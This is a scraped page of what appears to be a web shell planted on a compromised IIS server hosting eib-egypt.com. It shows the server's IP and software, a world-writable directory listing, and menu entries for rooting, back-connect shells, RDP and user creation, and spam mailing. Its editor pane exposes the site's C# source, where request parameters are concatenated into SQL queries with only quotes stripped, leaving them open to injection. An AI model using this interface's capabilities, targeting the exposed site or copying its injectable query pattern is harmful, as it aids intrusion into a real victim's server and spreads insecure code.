Windows NT HGWS2 10.0 build 14393 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 3.22.27.106
Cant Read [ /etc/named.conf ]
8.3.19
IWPD_185(eibegypt)
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
D: /
InetPub /
vhosts /
eib-egypt.com /
httpdocs /
AR /
[ HOME SHELL ]
Name
Size
Permission
Action
JS
[ DIR ]
drwxrwxrwx
Pics
[ DIR ]
drwxrwxrwx
Scripts
[ DIR ]
drwxrwxrwx
Slider_css
[ DIR ]
drwxrwxrwx
Slider_images
[ DIR ]
drwxrwxrwx
Slider_scripts
[ DIR ]
drwxrwxrwx
UpperBanner_Photos
[ DIR ]
drwxrwxrwx
fancybox
[ DIR ]
drwxrwxrwx
flaunt-js
[ DIR ]
drwxrwxrwx
mmenu-4.0.2
[ DIR ]
drwxrwxrwx
res-Slider
[ DIR ]
drwxrwxrwx
sidr-package-1.1.1
[ DIR ]
drwxrwxrwx
Copy of MasterPage.master
12.46
KB
-rw-rw-rw-
Copy of MasterPage.master.cs
2.33
KB
-rw-rw-rw-
Default.aspx
2.76
KB
-rw-rw-rw-
Default.aspx.cs
2.83
KB
-rw-rw-rw-
Design.psd
912.99
KB
-rw-rw-rw-
MasterPage.master
34.55
KB
-rw-rw-rw-
MasterPage.master.cs
11.72
KB
-rw-rw-rw-
Page.aspx
398
B
-rw-rw-rw-
Page.aspx.cs
369
B
-rw-rw-rw-
WUC_AdminBar.ascx
4.74
KB
-rw-rw-rw-
WUC_AdminBar.ascx.cs
17.62
KB
-rw-rw-rw-
WUC_EditorPage.ascx
648
B
-rw-rw-rw-
WUC_EditorPage.ascx.cs
5.89
KB
-rw-rw-rw-
WUC_Footer.ascx
1.62
KB
-rw-rw-rw-
WUC_Footer.ascx.cs
1.81
KB
-rw-rw-rw-
WUC_Header.ascx
1.6
KB
-rw-rw-rw-
WUC_Header.ascx.cs
1.73
KB
-rw-rw-rw-
WUC_UpperBanner.ascx
1.9
KB
-rw-rw-rw-
WUC_UpperBanner.ascx.cs
2.86
KB
-rw-rw-rw-
css_Main.css
8.25
KB
-rw-rw-rw-
css_Main_Mobile.css
1.93
KB
-rw-rw-rw-
ieupdate.js
150
B
-rw-rw-rw-
index.htm
318
B
-rw-rw-rw-
inner_Mail.aspx
2.91
KB
-rw-rw-rw-
inner_Mail.aspx.cs
4.55
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WUC_EditorPage.ascx.cs
using System; using System.Data; using System.Collections.Generic; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; public partial class AR_WUC_EditorPage : System.Web.UI.UserControl { EditorPage EP_1; bool bool_inAdmin = false; bool bool_HideControls = false; public string str_Position_Style; public string str_Size_Style; public string str_HdnFields; public int int_EditorPage_Type_ID; public string str_Group_Start_EditorPage_ID; DBAccess.DBAccess ClSqlCmd; public void Page_Load(object sender, EventArgs e) { ClSqlCmd = new DBAccess.DBAccess(System.Configuration.ConfigurationSettings.AppSettings["SE_ConnectionString"]); /////////////////////////////////////////////////////////////////////////// if (Session["AdminID" + System.Configuration.ConfigurationSettings.AppSettings["SE_ModuleID"]] == null || Session["AdminID" + System.Configuration.ConfigurationSettings.AppSettings["SE_ModuleID"]].ToString() == "") //Admin logged in { bool_inAdmin = false; tr_HdnFields.Visible = false; } else { bool_inAdmin = true; tr_HdnFields.Visible = true; } if (Session["HideControls"] == null || Session["HideControls"].ToString() == "") //Show Controls { bool_HideControls = false; } else { bool_HideControls = true; } ///////////////////////////////////////////////////////////////////////// if (!Page.IsPostBack) { GetData(int_EditorPage_Type_ID); } } public void GetData(int _int_EditorPage_Type_ID) { EP_1 = new EditorPage(Server, Request, "", bool_inAdmin, bool_HideControls, _int_EditorPage_Type_ID); string str_HTML = ""; string str_Start_EditorPage_ID; string str_Start_EditorPage_Type_ID; DataSet DS; str_HdnFields = ""; int_EditorPage_Type_ID = _int_EditorPage_Type_ID; str_Start_EditorPage_ID = "-1"; str_Start_EditorPage_Type_ID = ""; str_HTML = "<--Content-->"; ////////////////////////////////////////////////////////// #region Get str_Group_Start_EditorPage_ID = ClSqlCmd.DataSetSel(@"select [dbo].[__StandardEngine_F_Group_FirstPage]( [dbo].[__StandardEngine_F_EditorPage_Group_ID]( "+Request.Params["ID"].Replace("'","")+@" ) )").Tables[0].Rows[0][0].ToString(); EP_1.str_Group_Start_EditorPage_ID = str_Group_Start_EditorPage_ID; #endregion /////////////////////////////////////////////////////////// if ( int_EditorPage_Type_ID>0 ) //Header { str_Start_EditorPage_Type_ID = int_EditorPage_Type_ID.ToString(); /////////////////////////////////////////////// DS = ClSqlCmd.DataSetSel(@" SELECT [EditorPage_ID] ,[Position_Style] ,[Size_Style] FROM [dbo].[__StandardEngine_T_EditorPages] where [EditorPage_Type_ID]=" + int_EditorPage_Type_ID.ToString() + @" and [Module_ID]=" + System.Configuration.ConfigurationSettings.AppSettings["SE_ModuleID"]); if (DS.Tables.Count > 0 && DS.Tables[0].Rows.Count > 0 && DS.Tables[0].Rows[0]["EditorPage_ID"] != Convert.DBNull) { str_Size_Style = DS.Tables[0].Rows[0]["Size_Style"].ToString(); //////////////////////// str_Start_EditorPage_ID = DS.Tables[0].Rows[0]["EditorPage_ID"].ToString(); // str_HTML = @" // <table align=center border=0 cellpadding=0 cellspacing=0 style='width:100%; display:inline-table; position:relative'> // <tr><td><div class='element_Resize Main_OuterContent' style='display:inline-block; " + str_Size_Style + @"'> // <--Content--> // </div></td></tr> // </table> // "; //str_HdnFields += "<input id='hdn_Position_" + str_Start_EditorPage_ID + "' name='hdn_Position_" + str_Start_EditorPage_ID + "' type=hidden style='width:0px; height:0px' value='' />"; //str_HdnFields += "<input id='hdn_Size_" + str_Start_EditorPage_ID + "' name='hdn_Size_" + str_Start_EditorPage_ID + "' type=hidden style='width:0px; height:0px' value='' />"; } else { str_Start_EditorPage_ID = "-1"; } } else { str_Start_EditorPage_ID=Request.Params["ID"].Replace("'",""); //str_HTML = "<--Content-->"; } ////////////////////////////////////////////////////////// str_HTML = str_HTML.Replace("<--Content-->", EP_1.f_FormEditorPage(str_Start_EditorPage_ID, str_Start_EditorPage_Type_ID, "", 0, "")); //str_HTML = f_FormEditorPage(str_Start_EditorPage_ID, str_Start_EditorPage_Type_ID, "", 0); /////////////////////////////////////////////// td_Content.InnerHtml = str_HTML; if (bool_inAdmin) { //str_HdnFields += "<input id='hdn_Deleted_IDs' name='hdn_Deleted_IDs' type=text style='width:0px; height:0px' value='' />"; td_HdnFields.InnerHtml = EP_1.str_HdnFields; } } }
Close